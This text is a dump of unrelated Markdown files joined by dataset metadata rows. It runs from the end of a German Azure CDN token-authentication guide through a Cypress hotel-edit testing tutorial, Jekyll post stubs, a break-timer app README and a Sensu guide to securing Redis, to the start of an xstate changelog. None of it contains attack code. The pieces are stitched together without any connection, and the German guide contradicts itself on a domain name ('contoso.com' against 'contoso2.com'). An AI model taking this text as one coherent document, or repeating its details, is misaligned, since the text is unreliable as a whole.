> Wenn das Token beispielsweise am `12/31/2016 12:00:00 GMT` ablaufen soll, geben Sie den UNIX-Zeitstempelwert `1483185600` ein.
> </tr>
> <tr>
> <td><b>ec_url_allow</b></td>
> <td>Dient zum Anpassen von Token an ein bestimmtes Asset oder einen Pfad. Der Zugriff wird auf Anforderungen beschränkt, deren URL mit einem bestimmten relativen Pfad beginnt. Bei URLs wird die Groß-/Kleinschreibung berücksichtigt. Geben Sie mehrere Pfade ein, indem Sie als Trennzeichen jeweils ein Komma verwenden. Fügen Sie außerdem keine Leerzeichen hinzu. Je nach Ihren Anforderungen können Sie andere Werte angeben, um unterschiedliche Zugriffsebenen bereitzustellen.>
> Für die URL `http://www.mydomain.com/pictures/city/strasbourg.png` sind diese Anforderungen z.B. für die folgenden Eingabewerte zulässig:
> <ul>
> <li>Eingabewert `/`: Alle Anforderungen sind zulässig.</li>
> <li>Eingabewert `/pictures`: Die folgenden Anforderungen sind zulässig: <ul>
> <li>`http://www.mydomain.com/pictures.png`</li>
> <li>`http://www.mydomain.com/pictures/city/strasbourg.png`</li>
> <li>`http://www.mydomain.com/picturesnew/city/strasbourgh.png`</li>
> </ul></li>
> <li>Eingabewert `/pictures/`: Nur Anforderungen mit dem Pfad `/pictures/` sind zulässig. Beispiel: `http://www.mydomain.com/pictures/city/strasbourg.png`.</li>
> <li>Eingabewert `/pictures/city/strasbourg.png`: Nur Anforderungen für diesen speziellen Pfad und dieses Asset sind zulässig.</li>
> </ul>
> </tr>
> <tr>
> <td><b>ec_country_allow</b></td>
> <td>Es sind nur Anforderungen zulässig, die aus einem oder mehreren der angegebenen Länder/Regionen stammen. Anforderungen aus allen anderen Ländern/Regionen werden abgelehnt. Verwenden Sie für jedes Land/jede Region einen aus zwei Buchstaben bestehenden [Ländercode nach ISO 3166](/previous-versions/azure/mt761717(v=azure.100)). Trennen Sie alle Länder/Regionen jeweils mit einem Komma voneinander, und fügen Sie keine Leerzeichen ein. Beispiel: Wenn Sie den Zugriff nur aus den USA und aus Frankreich zulassen möchten, geben Sie `US,FR` ein.</td>
> </tr>
> <tr>
> <td><b>ec_country_deny</b></td>
> <td>Dient zum Ablehnen von Anforderungen, die aus einem oder mehreren angegebenen Ländern/Regionen stammen. Anforderungen aus allen anderen Ländern/Regionen werden zugelassen. Die Implementierung ist identisch mit dem <b>ec_country_allow</b>-Parameter. Ist ein Länder-/Regionscode sowohl im <b>ec_country_allow</b>-Parameter als auch im <b>ec_country_deny</b>-Parameter vorhanden, hat der <b>ec_country_allow</b>-Parameter Vorrang.</td>
> </tr>
> <tr>
> <td><b>ec_ref_allow</b></td>
> <td>Es werden nur Anforderungen vom angegebenen Verweiser zugelassen. Mit einem Verweiser wird die URL der Webseite identifiziert, die als Link zur angeforderten Ressource dient. Nehmen Sie das Protokoll nicht in den Parameterwert auf.>
> Die folgenden Eingabetypen sind zulässig:
> <ul>
> <li>Ein Hostname oder ein Hostname und ein Pfad.</li>
> <li>Mehrere Verweiser. Um mehrere Verweiser hinzuzufügen, trennen Sie sie durch Kommas und fügen Sie kein Leerzeichen hinzu. Wenn Sie einen Verweiserwert angeben, die entsprechenden Informationen aufgrund der Browserkonfiguration aber nicht mit der Anforderung gesendet werden, wird die Anforderung standardmäßig abgelehnt.</li>
> <li>Anforderungen mit fehlenden oder leeren Verweiserinformationen. Standardmäßig blockiert der Parameter <b>ec_ref_allow</b> diese Anforderungstypen. Um solche Anforderungen zuzulassen, geben Sie entweder den Text „missing“ oder einen leeren Wert (unter Verwendung eines nachgestellten Kommas) ein.</li>
> <li>Unterdomänen. Um Unterdomänen zuzulassen, geben Sie ein Sternchen (\*) ein. Um beispielsweise alle Unterdomänen von `contoso.com` zuzulassen, geben Sie `*.contoso.com` ein.</li>
> </ul>
> Beispielsweise geben Sie `www.contoso.com,*.contoso.com,missing` ein, um Zugriff für Anforderungen von `www.contoso.com`, allen Unterdomänen unter `contoso2.com` und Anforderungen mit leeren oder fehlenden Verweisern zuzulassen.</td>
> </tr>
> <tr>
> <td><b>ec_ref_deny</b></td>
> <td>Dient zum Ablehnen von Anforderungen über den angegebenen Verweiser. Die Implementierung ist identisch mit dem <b>ec_ref_allow</b>-Parameter. Ist ein Verweiser sowohl im <b>ec_ref_allow</b>- als auch im <b>ec_ref_deny</b>-Parameter vorhanden, dann hat der Parameter <b>ec_ref_allow</b> Vorrang.</td>
> </tr>
> <tr>
> <td><b>ec_proto_allow</b></td>
> <td>Es werden nur Anforderungen vom angegebenen Protokoll zugelassen. Gültige Werte sind `http`, `https` oder `http,https`.</td>
> </tr>
> <tr>
> <td><b>ec_proto_deny</b></td>
> <td>Dient zum Ablehnen von Anforderungen vom angegebenen Protokoll. Die Implementierung ist identisch mit dem <b>ec_proto_allow</b>-Parameter. Ist ein Protokoll sowohl im <b>ec_proto_allow</b>- als auch im <b>ec_proto_deny</b>-Parameter vorhanden, dann hat der Parameter <b>ec_proto_allow</b> Vorrang.</td>
> </tr>
> <tr>
> <td><b>ec_clientip</b></td>
> <td>Beschränkt den Zugriff auf die IP-Adresse der angegebenen anfordernden Person. IPv4 und IPv6 werden unterstützt. Sie können entweder eine einzelne Anforderungs-IP-Adresse oder einem bestimmten Subnetz zugeordnete IP-Adressen angeben. Beispielsweise gestattet `11.22.33.0/22` Anforderungen der IP-Adressen 11.22.32.1 bis 11.22.35.254.</td>
> </tr>
> </table>
5. Nach der Eingabe von Werten für die Verschlüsselungsparameter wählen Sie den Schlüssel zum Verschlüsseln (wenn Sie einen Primär- und einen Sicherungsschlüssel erstellt haben) aus der Liste **Schlüssel zum Verschlüsseln** aus.
6. Wählen Sie in der Liste **Verschlüsselungsversion** eine Verschlüsselungsversion aus: **V2** für Version 2 oder **V3** für Version 3 (empfohlen).
7. Klicken Sie auf **Verschlüsseln**, um das Token zu generieren.
Nachdem das Token generiert wurde, wird es im Feld **Generated Token** (Generiertes Token) angezeigt. Zur Verwendung des Tokens fügen Sie es als Abfragezeichenfolge am Ende der Datei im URL-Pfad ein. Beispiel: `http://www.domain.com/content.mov?a4fbc3710fd3449a7c99986b`.
8. Testen Sie Ihr Token optional mit dem Entschlüsselungstool, um die Parameter Ihres Tokens anzuzeigen. Fügen Sie den Tokenwert in das Feld **Token zum Entschlüsseln** ein. Wählen Sie den zu verwendenden Verschlüsselungsschlüssel aus der Liste **Schlüssel zum Entschlüsseln** aus, und klicken Sie auf **Entschlüsseln**.
Nach der Entschlüsselung des Tokens werden seine Parameter im Feld **Ursprüngliche Parameter** angezeigt.
9. Passen Sie optional den Typ des Antwortcodes an, der zurückgegeben wird, wenn eine Anforderung abgelehnt wird. Wählen Sie **Aktiviert** aus, und wählen Sie dann den Antwortcode aus der Liste **Antwortcode** aus. **Headername** wird automatisch auf **Speicherort** festgelegt. Klicken Sie auf **Speichern**, um den neuen Antwortcode zu implementieren. Für bestimmte Antwortcodes müssen Sie auch die URL Ihrer Fehlerseite in das Feld **Headerwert** eingeben. Der Antwortcode **403** („Unzulässig“) ist standardmäßig aktiviert.
3. Klicken Sie unter **HTTP Large** auf **Regel-Engine**. Sie verwenden die Regel-Engine, um Pfade zum Anwenden der Funktion zu definieren und die Tokenauthentifizierung sowie weitere Funktionen zur Tokenauthentifizierung zu aktivieren. Weitere Informationen finden Sie unter [Azure CDN-Regel-Engine](cdn-rules-engine-reference.md).
1. Wählen Sie eine vorhandene Regel aus, oder erstellen Sie eine neue Regel, um das Asset oder den Pfad zu definieren, auf das bzw. den Sie die Tokenauthentifizierung anwenden möchten.
2. Zum Aktivieren der Tokenauthentifizierung für eine Regel wählen Sie **[Token Auth](https://docs.vdms.com/cdn/Content/HRE/F/Token-Auth.htm)** aus der Liste **Features** und dann **Aktiviert** aus. Klicken Sie auf **Aktualisieren**, wenn Sie eine Regel aktualisieren, oder auf **Hinzufügen**, wenn Sie eine Regel erstellen.

4. In der Regel-Engine können Sie auch weitere Features im Zusammenhang mit der Tokenauthentifizierung aktivieren. Um die folgenden Features zu aktivieren, wählen Sie sie in der Liste **Features** aus, und wählen Sie dann **Aktiviert** aus.
- **[Token Auth Denial Code:](https://docs.vdms.com/cdn/Content/HRE/F/Token-Auth-Denial-Code.htm)** Gibt den Typ der Antwort an, die an einen Benutzer zurückgegeben wird, wenn eine Anforderung abgelehnt wird. Hier festgelegte Regeln setzen den Antwortcode außer Kraft, der im Abschnitt **Custom Denial Handling** auf der Seite für die tokenbasierte Authentifizierung festgelegt wurde.
- **[Token Auth Ignore URL Case:](https://docs.vdms.com/cdn/Content/HRE/F/Token-Auth-Ignore-URL-Case.htm)** Legt fest, ob für die zum Überprüfen des Tokens verwendete URL die Groß-/Kleinschreibung berücksichtigt wird.
- **[Token Auth Parameter:](https://docs.vdms.com/cdn/Content/HRE/F/Token-Auth-Parameter.htm)** Benennt den Parameter der Abfragezeichenfolge für die Tokenauthentifizierung, der in der angeforderten URL angezeigt wird, um.

5. Sie können Ihr Token anpassen, indem Sie auf Quellcode in [GitHub](https://github.com/VerizonDigital/ectoken) zugreifen.
Verfügbare Sprachen:
- C
- C#
- PHP
- Perl
- Java
- Python
## <a name="azure-cdn-features-and-provider-pricing"></a>Preise für Azure CDN-Funktionen und -Anbieter
Weitere Informationen zu Funktionen finden Sie unter [Azure CDN-Produktfeatures](cdn-features.md). Weitere Informationen zur Preisgestaltung finden Sie unter [Azure Content Delivery Network – Preise ](https://azure.microsoft.com/pricing/details/cdn/).
| 90.034483 | 604 | 0.760628 | deu_Latn | 0.996803 |
e03e4bccffcd0dde895786f753d92e4fa5d72023 | 7,459 | md | Markdown | 05-testing/03-e2e/06-edit-hotel/README.md | AghLearning/master-frontend-lemoncode | 1efe6576cdf00cb3e15cde9cc3916e6ce4759f29 | [
"MIT"
] | null | null | null | 05-testing/03-e2e/06-edit-hotel/README.md | AghLearning/master-frontend-lemoncode | 1efe6576cdf00cb3e15cde9cc3916e6ce4759f29 | [
"MIT"
] | null | null | null | 05-testing/03-e2e/06-edit-hotel/README.md | AghLearning/master-frontend-lemoncode | 1efe6576cdf00cb3e15cde9cc3916e6ce4759f29 | [
"MIT"
] | null | null | null | # 06 Edit hotel
In this example we are going to test a `hotel edit`.
We will start from `05-custom-commands`.
# Steps to build it
- `npm install` to install previous sample packages:
```bash
npm install
```
- To edit a hotel we need to visit `hotels` and click on the edit button:
### ./cypress/integration/hotel-edit.spec.ts
```javascript
describe('Hotel edit specs', () => {
it('should navigate to second hotel when click on edit second hotel', () => {
// Arrange
// Act
// Assert
});
});
```
- To make the `edit button selector` available, we need to add an accessibility label:
### ./src/pods/hotel-collection/components/hotel-card.component.tsx
```diff
...
<CardActions>
<IconButton
+ aria-label="Edit hotel"
onClick={() => history.push(linkRoutes.hotelEdit(hotel.id))}
>
<EditIcon />
</IconButton>
</CardActions>
```
- Add spec:
### ./cypress/integration/hotel-edit.spec.ts
```diff
...
it('should navigate to second hotel when click on edit second hotel', () => {
// Arrange
// Act
+ cy.loadAndVisit('/api/hotels', '/hotel-collection');
+ cy.findAllByRole('button', { name: 'Edit hotel' }).then((buttons) => {
+ buttons[1].click();
+ });
// Assert
+ cy.url().should('eq', 'http://localhost:8080/#/hotel-edit/2');
});
```
- Add update hotel spec:
### ./cypress/integration/hotel-edit.spec.ts
```diff
...
+ it('should update hotel name when it edits an hotel and click on save button', () => {
+ // Arrange
+ // Act
+ cy.loadAndVisit('/api/hotels', '/hotel-collection');
+ cy.findAllByRole('button', { name: 'Edit hotel' }).then((buttons) => {
+ buttons[1].click();
+ });
+ cy.findByLabelText('Name').clear().type('Updated hotel two');
+ cy.findByRole('button', { name: 'Save' }).click();
+ // Assert
+ cy.findByText('Updated hotel two');
+ });
```
- The previous spec may or may not work, because we are not waiting for the get-hotel request to resolve. If we change the network to `Slow 3G` in `Chrome options` to simulate it, we will need to do something like:
### ./cypress/integration/hotel-edit.spec.ts
```diff
...
it('should update hotel name when it edits an hotel and click on save button', () => {
// Arrange
// Act
cy.loadAndVisit('/api/hotels', '/hotel-collection');
+ cy.intercept('GET', '/api/hotels/2').as('loadHotel');
cy.findAllByRole('button', { name: 'Edit hotel' }).then((buttons) => {
buttons[1].click();
});
+ cy.wait('@loadHotel');
+ cy.findByLabelText('Name').should('not.have.value', '');
cy.findByLabelText('Name').clear().type('Updated hotel two');
cy.findByRole('button', { name: 'Save' }).click();
// Assert
+ cy.wait('@load'); // TODO: Refactor custom command loadAndVisit
cy.findByText('Updated hotel two');
});
```
> Notice: the test has to wait until the field has some value.
- Refactor command:
### ./cypress/support/commands.ts
```diff
+ interface Resource {
+ path: string;
+ fixture?: string;
+ alias?: string;
+ }
Cypress.Commands.add(
'loadAndVisit',
- (apiPath: string, routePath: string, fixture?: string) => {
+ (visitUrl: string, resources: Resource[], callbackAfterVisit?: () => void) => {
- Boolean(fixture)
- ? cy.intercept('GET', apiPath, { fixture }).as('load')
- : cy.intercept('GET', apiPath).as('load');
+ const aliasList = resources.map((resource, index) => {
+ const alias = resource.alias || `load-${index}`;
+ Boolean(resource.fixture)
+ ? cy
+ .intercept('GET', resource.path, { fixture: resource.fixture })
+ .as(alias)
+ : cy.intercept('GET', resource.path).as(alias);
+ return alias;
+ });
- cy.visit(routePath);
+ cy.visit(visitUrl);
+ if (callbackAfterVisit) {
+ callbackAfterVisit();
+ }
- cy.wait('@load');
+ aliasList.forEach((alias) => {
+ cy.wait(`@${alias}`);
+ });
}
);
```
- Update `d.ts`:
### ./cypress/support/index.d.ts
```diff
declare namespace Cypress {
+ interface Resource {
+ path: string;
+ fixture?: string;
+ alias?: string;
+ }
interface Chainable {
loadAndVisit(
- apiPath: string,
+ visitUrl: string,
- routePath: string,
+ resources: Resource[],
- fixture?: string
+ callbackAfterVisit?: () => void
): Chainable<Element>;
}
}
```
- Update specs:
### ./cypress/integration/hotel-edit.spec.ts
```diff
...
it('should navigate to second hotel when click on edit second hotel', () => {
// Arrange
// Act
- cy.loadAndVisit('/api/hotels', '/hotel-collection');
+ cy.loadAndVisit('/hotel-collection', [{ path: '/api/hotels' }]);
cy.findAllByRole('button', { name: 'Edit hotel' }).then((buttons) => {
buttons[1].click();
});
// Assert
cy.url().should('eq', 'http://localhost:8080/#/hotel-edit/2');
});
it('should update hotel name when it edits an hotel and click on save button', () => {
// Arrange
// Act
- cy.loadAndVisit('/api/hotels', '/hotel-collection');
+ cy.loadAndVisit(
+ '/hotel-collection',
+ [
+ { path: '/api/hotels', alias: 'loadHotels' },
+ { path: '/api/hotels/2' },
+ { path: '/api/cities' },
+ ],
+ () => {
+ cy.findAllByRole('button', { name: 'Edit hotel' }).then((buttons) => {
+ buttons[1].click();
+ });
+ }
+ );
- cy.intercept('GET', '/api/hotels/2').as('loadHotel');
- cy.findAllByRole('button', { name: 'Edit hotel' }).then((buttons) => {
- buttons[1].click();
- });
- cy.wait('@loadHotel');
cy.findByLabelText('Name').should('not.have.value', '');
cy.findByLabelText('Name').clear().type('Updated hotel two');
cy.findByRole('button', { name: 'Save' }).click();
// Assert
- cy.wait('@load'); // TODO: Refactor custom command loadAndVisit
+ cy.wait('@loadHotels');
cy.findByText('Updated hotel two');
});
```
### ./cypress/integration/hotel-collection.spec.ts
```diff
...
it('should fetch hotel list and show it in screen when visit /hotel-collection url', () => {
// Arrange
// Act
- cy.loadAndVisit('/api/hotels', '/hotel-collection');
+ cy.loadAndVisit('/hotel-collection', [{ path: '/api/hotels' }]);
// Assert
cy.findAllByRole('listitem').should('have.length', 10);
});
it('should fetch hotel list greater than 0 when visit /hotel-collection url', () => {
// Arrange
// Act
- cy.loadAndVisit('/api/hotels', '/hotel-collection');
+ cy.loadAndVisit('/hotel-collection', [{ path: '/api/hotels' }]);
// Assert
cy.findAllByRole('listitem').should('have.length.greaterThan', 0);
});
it('should fetch two hotels when visit /hotel-collection url', () => {
// Arrange
// Act
- cy.loadAndVisit('/api/hotels', '/hotel-collection', 'hotels.json');
+ cy.loadAndVisit('/hotel-collection', [
+ { path: '/api/hotels', fixture: 'hotels.json' },
+ ]);
// Assert
cy.findAllByRole('listitem').should('have.length', 2);
});
```
# About Basefactor + Lemoncode
We are an innovating team of Javascript experts, passionate about turning your ideas into robust products.
[Basefactor, consultancy by Lemoncode](http://www.basefactor.com) provides consultancy and coaching services.
[Lemoncode](http://lemoncode.net/services/en/#en-home) provides training services.
For the LATAM/Spanish audience we are running an Online Front End Master degree, more info: http://lemoncode.net/master-frontend
| 24.536184 | 205 | 0.609733 | eng_Latn | 0.457073 |
e03f03c7268bbebd3b211c2978babd689123080a | 218 | md | Markdown | _watches/M20211223_034734_TLP_3.md | Meteoros-Floripa/meteoros.floripa.br | 7d296fb8d630a4e5fec9ab1a3fb6050420fc0dad | [
"MIT"
] | 5 | 2020-01-22T17:44:06.000Z | 2020-01-26T17:57:58.000Z | _watches/M20211223_034734_TLP_3.md | Meteoros-Floripa/site | 764cf471d85a6b498873610e4f3b30efd1fd9fae | [
"MIT"
] | null | null | null | _watches/M20211223_034734_TLP_3.md | Meteoros-Floripa/site | 764cf471d85a6b498873610e4f3b30efd1fd9fae | [
"MIT"
] | null | null | null | ---
layout: watch
title: TLP3 - 23/12/2021 - M20211223_034734_TLP_3T.jpg
date: 2021-12-23 03:47:34
permalink: /2021/12/23/watch/M20211223_034734_TLP_3
capture: TLP3/2021/202112/20211222/M20211223_034734_TLP_3T.jpg
---
| 27.25 | 62 | 0.784404 | fra_Latn | 0.041028 |
e03f0a3facc75ac338d92b19ee5ef6ece37a4146 | 364 | md | Markdown | split2/_posts/2016-07-16-Om daamodaraaya namaha 108 times.md | gbuk21/HinduGodsEnglish | b883907ef10e8beaa6030070fc2b8181152def47 | [
"MIT"
] | null | null | null | split2/_posts/2016-07-16-Om daamodaraaya namaha 108 times.md | gbuk21/HinduGodsEnglish | b883907ef10e8beaa6030070fc2b8181152def47 | [
"MIT"
] | null | null | null | split2/_posts/2016-07-16-Om daamodaraaya namaha 108 times.md | gbuk21/HinduGodsEnglish | b883907ef10e8beaa6030070fc2b8181152def47 | [
"MIT"
] | null | null | null | ---
layout: post
last_modified_at: 2021-03-30
title: om daamodaraaya namaha 108 times
youtubeId: Tm4bWbtIN5w
---
Om Sarvaasrayaya kramaya nama
- Who has discipline in everything
{% include youtubePlayer.html id=page.youtubeId %}
[Next]({{ site.baseurl }}{% link split2/_posts/2016-07-15-Om mahaatapase namaha 108 times.md%})
| 13 | 96 | 0.681319 | eng_Latn | 0.405821 |
e0401a84b8f02476cf43c0ae51a307b0561f4e7a | 3,398 | md | Markdown | components/beta/README.md | ty2k/design-system | 34889ae5e8ac6446b20936249d15acd064c00984 | [
"Apache-2.0"
] | 34 | 2018-12-03T18:48:23.000Z | 2022-02-28T22:14:08.000Z | components/beta/README.md | ty2k/design-system | 34889ae5e8ac6446b20936249d15acd064c00984 | [
"Apache-2.0"
] | 190 | 2018-10-16T21:13:41.000Z | 2021-12-01T17:24:29.000Z | components/beta/README.md | ty2k/design-system | 34889ae5e8ac6446b20936249d15acd064c00984 | [
"Apache-2.0"
] | 37 | 2018-10-10T19:15:35.000Z | 2022-01-10T13:36:10.000Z | ---
description: Beta status indicator
title: Beta Status
status: Draft
author: dlevine
---

> Last Updated: February 22, 2019
# Beta Status
The beta status indicator tells users that the product is still being worked on.
## Example
<component-preview path="components/beta/sample.html" height="100px" width="800px"> </component-preview>
## Use This For:
* Indicating your service is still being worked on and things may change.
## Don't Use This when:
* Your service is live and is no longer being actively worked on.
## Rationale
* The beta text has no border so users don't confuse the status for a button
* The text is visually distinct from the service name
Discuss this design on the [Beta Status Github Issue](https://github.com/bcgov/design-system/issues/78)
## Behaviour
1. Additional research is being done on how users interact with and understand the meaning of Beta.
## Accessibility
This component has been built according to [WCAG 2.0 AA](https://www.w3.org/TR/WCAG20/) standards and all government services should strive to meet this level. This component successfully includes the following accessibility features:
### Screen readers
(coming soon)
### Colour Contrast
* Gold text exceeds a 7:1 [contrast ratio](https://webaim.org/articles/contrast/) on the header blue background
## Code
### HTML
```html
<!--
All in-line CSS is specific to this sample; it can and should be ignored.
-->
<header>
<div class="banner">
<a href="https://gov.bc.ca" alt="British Columbia">
<img src="../assets/images/logo-banner.svg" alt="Go to the Government of British Columbia website" />
</a>
<h1>Hello British Columbia</h1>
<div aria-label="This application is currently in Beta phase" class=Beta-PhaseBanner>
Beta
</div>
</div>
<div class="other">
<!--
This place is for anything that needs to be right aligned
beside the logo.
-->
</div>
</div>
</header>
```
### CSS
```css
header {
background-color: #036;
border-bottom: 2px solid #fcba19;
padding: 0 65px 0 65px;
color: #fff;
display: flex;
height: 65px;
top: 0px;
position: fixed;
width: 100%;
}
header h1 {
  font-family: 'BCSans', 'Noto Sans', Verdana, Arial, sans-serif;
font-weight: normal; /* 400 */
margin: 5px 5px 0 18px;
visibility: hidden;
}
header .banner {
display: flex;
justify-content: flex-start;
align-items: center;
margin: 0 10px 0 0;
/* border-style: dotted;
border-width: 1px;
border-color: lightgrey; */
}
header .other {
display: flex;
flex-grow: 1;
/* border-style: dotted;
border-width: 1px;
border-color: lightgrey; */
}
.Beta-PhaseBanner {
color: #fcba19;
margin-top: -1em;
text-transform: uppercase;
font-weight: 600;
font-size: 16px;
}
:focus {
outline: 4px solid #3B99FC;
outline-offset: 1px;
}
/*
These are sample media queries only. Media queries are quite subjective
but, in general, should be made for the three different classes of screen
size: phone, tablet, full.
*/
@media screen and (min-width: 600px) and (max-width: 899px) {
header h1 {
font-size: calc(7px + 2.2vw);
visibility: visible;
}
}
@media screen and (min-width: 900px) {
header h1 {
font-size: 2.0em;
visibility: visible;
}
}
```
| 23.597222 | 235 | 0.677163 | eng_Latn | 0.939706 |
e0405f4a8f5dcf88861d445da292b5b9ea409e82 | 1,505 | md | Markdown | src/pages/news/2019-03-03---fraudsters-beware-the-ato-is-sharing-employment-data-with-the-department-of-home-affairs.md | adrienlozano/stephaniewebsite | b71ac3b17976b4c24686d2e929250fa5b0150713 | [
"MIT"
] | 1 | 2018-06-01T17:28:50.000Z | 2018-06-01T17:28:50.000Z | src/pages/news/2019-03-03---fraudsters-beware-the-ato-is-sharing-employment-data-with-the-department-of-home-affairs.md | adrienlozano/stephaniewebsite | b71ac3b17976b4c24686d2e929250fa5b0150713 | [
"MIT"
] | 3 | 2021-03-09T03:31:21.000Z | 2021-09-20T23:55:04.000Z | src/pages/news/2019-03-03---fraudsters-beware-the-ato-is-sharing-employment-data-with-the-department-of-home-affairs.md | adrienlozano/stephaniewebsite | b71ac3b17976b4c24686d2e929250fa5b0150713 | [
"MIT"
] | null | null | null | ---
title: >-
Fraudsters Beware: the ATO is Sharing Employment Data with the Department of
Home Affairs
date: '2019-03-03T00:00:00.000Z'
caption: >-
The ATO is sharing data with the Department of Home Affairs to ensure that
business sponsors are complying with their sponsorship obligations and visa
holders are complying with their visa conditions.
image: /images/Warning.PNG
tags:
- Temporary Work (Skilled)
- subclass 457
- Temporary Skills Shortage
- subclass 482
---
The ATO is sharing data with the Department of Home Affairs to
ensure that business sponsors are complying with their sponsorship obligations
and visa holders are complying with their visa conditions. A finding of non-compliance could be used to cancel a
business’ sponsorship approval or a sponsored worker’s visa.
The data exchange is occurring in relation to people who
currently hold or have held a Temporary
Work (Skilled) (subclass 457) or Temporary Skills Shortage (subclass 482)
primary visa in the three most recently completed financial years and their
respective business sponsors.
The type of information the ATO is sharing with the Department of Home Affairs includes:
* How much a business is paying a sponsored visa holder;
* Whether a visa holder is only working for their approved employer; and
* Whether a visa holder is only working in their approved occupation.
If
you need advice or assistance with an employer sponsored visa, contact the experienced staff at Moore
Migration today.
| 35.833333 | 113 | 0.791362 | eng_Latn | 0.999721 |
e04082fc089ee6df3b30255d3c0fb78c5e351311 | 2,152 | md | Markdown | README.md | Olian04/get-shit-done | 86ea14d732588daf89bbc05b6ce5166e4a6f089c | [
"MIT"
] | null | null | null | README.md | Olian04/get-shit-done | 86ea14d732588daf89bbc05b6ce5166e4a6f089c | [
"MIT"
] | null | null | null | README.md | Olian04/get-shit-done | 86ea14d732588daf89bbc05b6ce5166e4a6f089c | [
"MIT"
] | null | null | null | # get-shit-done
A timekeeping web app that helps you get shit done. Inspired by pomodoro, it allows you to define your own reward system, where the reward is break time.
Ex:
• gain 5 min break time every 20 min of work (regular pomodoro)
• continously gain 5% of time spent working as break time
• gain 1 min break time every time you press a button
• gain 5 min break time every 3rd time you press a button
The app UI consists of 2 vertical segments. Break time, and work time. Break time (at the top of the screen) shows you a button that says take a break, along with a clock indicating how much break time you have earned.
Work time (the lower segment) shows a grid of the reward systems currently in use. One might be a timer, one could be a button, another might be a continuous counting number with a % converted to break time.
Once you click take a break, the lower half of the screen shrinks and the top half grows to almost fill the entire screen. It then starts counting down the break timer, showing the text "Enjoy your break", while the lower half shows "Get back to work?".
Creating your own reward system:
The edit page allows the user to have between 1 and 9 simultaneous reward systems at once. It also allows the user to place the systems in a 3x3 grid. Once placed the grid shrinks to the smallest it can be while still accommodating all of the systems the user placed in it, and respecting their placements.
Ex:
1 0 0 1 0
0 1 0 shrinks to 0 1
0 0 0
1 1 0
0 0 0 doesn't shrink
1 0 1
The shrinkage only happens from right to left and from bottom to top.
Dev notes:
Pages needed:
- main page (houses menu button, split segments for work page & break page)
- work page
- break page
- edit reward systems & layout
- config one reward system
## Project setup
```
npm install
```
### Compiles and hot-reloads for development
```
npm run serve
```
### Compiles and minifies for production
```
npm run build
```
### Run your unit tests
```
npm run test:unit
```
### Lints and fixes files
```
npm run lint
```
### Customize configuration
See [Configuration Reference](https://cli.vuejs.org/config/).
| 30.742857 | 306 | 0.739312 | eng_Latn | 0.99914 |
e040dbb0c0dbee58734ae33bca4848d981a905cc | 176 | md | Markdown | multitenant/readme.md | tinslice/crusader | 3ac34c9aa42326212a4f7719503e615101641776 | [
"MIT"
] | 1 | 2021-07-13T16:13:54.000Z | 2021-07-13T16:13:54.000Z | multitenant/readme.md | tinslice/crusader | 3ac34c9aa42326212a4f7719503e615101641776 | [
"MIT"
] | null | null | null | multitenant/readme.md | tinslice/crusader | 3ac34c9aa42326212a4f7719503e615101641776 | [
"MIT"
] | null | null | null | # crusader-multitenant
Simple way of adding multi tenancy to a java project.
Examples:
- [multi tenant spring boot application](../examples/multitenant-spring-boot-example) | 25.142857 | 86 | 0.784091 | eng_Latn | 0.895963 |
e041014f51a9f3d97359535292788fd87e73e742 | 3,078 | md | Markdown | content/sensu-core/1.1/guides/securing-redis.md | LindsayHill/sensu-docs | 25db17add1b0f99e61306dc5916e99cdce676be7 | [
"MIT"
] | null | null | null | content/sensu-core/1.1/guides/securing-redis.md | LindsayHill/sensu-docs | 25db17add1b0f99e61306dc5916e99cdce676be7 | [
"MIT"
] | null | null | null | content/sensu-core/1.1/guides/securing-redis.md | LindsayHill/sensu-docs | 25db17add1b0f99e61306dc5916e99cdce676be7 | [
"MIT"
] | null | null | null | ---
title: "Securing Redis"
description: "Strategies and best practices for securing Redis"
product: "Sensu Core"
version: "1.1"
weight: 9
next: ../securing-rabbitmq
previous: ../securing-sensu
menu:
sensu-core-1.1:
parent: guides
---
Redis is a key-value database, which describes itself as “an open source, BSD licensed, advanced key-value cache and store”. Sensu uses Redis for storing persistent data. Two Sensu services, the server and API, require access to the same instance of Redis to function.
This guide will discuss best practices to use with Redis for use with Sensu.
## Objectives
This guide will discuss the following:
* [Redis General Security Model](#redis-general-security-model)
* [Securing Redis with a Local Install](#securing-redis-with-a-local-install)
* [Securing Redis via Localhost Security](#securing-redis-localhost-security)
## Redis General Security Model{#redis-general-security-model}
Redis was designed to be accessed by trusted clients inside a closed network environment. As such it is recommended that Redis instances not be directly exposed to the internet or have access in general to untrusted clients that can directly connect to the Redis TCP port or UNIX socket.
Best practices from the [Redis Security Documentation][1] suggest blocking port level access to all hosts except trusted hosts, in our case your Sensu-Server, Sensu-API and/or Sensu-Enterprise-Server.
_NOTE: As of [Sensu 1.3.0][2], TLS is now supported, allowing you to encrypt your traffic between Sensu and Redis when being used as a Transport or Datastore._
## Securing Redis with a Local Installation of Sensu{#securing-redis-with-a-local-install}
For instances where you will be running Redis on the same host that you will be running Sensu, you can configure Redis to listen to the localhost only on the host loopback IP address.
To accomplish this you will need to edit `/etc/redis/redis.conf` with the following line:
{{< highlight shell >}}
bind 127.0.0.1
{{< /highlight >}}
After making the above change, you will need to restart the Redis service.
## Securing Redis via Localhost Security{#securing-redis-localhost-security}
### Redis Configuration
The Redis documentation recommends limiting access to the TCP port Redis uses. By default Redis uses the following ports:
* 6379 For standalone Redis instances
* 16379 For clustered Redis instances
* 26379 For Sential instances
We recommend binding to the host IP address instead of binding to all IP's on the host. This can be accomplished by configuring `bind` to the IP address in `/etc/redis/redis.conf`:
{{< highlight shell >}}
bind 192.168.50.41
{{< /highlight >}}
After making the change you will need to restart the Redis service so the changes take effect.
### Host Configuration
Once Redis is bound to the IP address you can then limit access to its specific IP/port using internal security tools such as host firewalls, networking ACL or other methods of locking down access to a specific host/port.
[1]: https://redis.io/topics/security
[2]: ../../../1.3/reference/redis | 43.971429 | 287 | 0.773554 | eng_Latn | 0.992896 |
e04107ecc50c0047e0d1606f2f60da79c584fc2f | 6,716 | md | Markdown | packages/xstate-inspect/CHANGELOG.md | eostrom/xstate | 43f4e91653c18eb6a1e729875033b6be80503882 | [
"MIT"
] | null | null | null | packages/xstate-inspect/CHANGELOG.md | eostrom/xstate | 43f4e91653c18eb6a1e729875033b6be80503882 | [
"MIT"
] | null | null | null | packages/xstate-inspect/CHANGELOG.md | eostrom/xstate | 43f4e91653c18eb6a1e729875033b6be80503882 | [
"MIT"
] | null | null | null | # @xstate/inspect
## 0.6.2
### Patch Changes
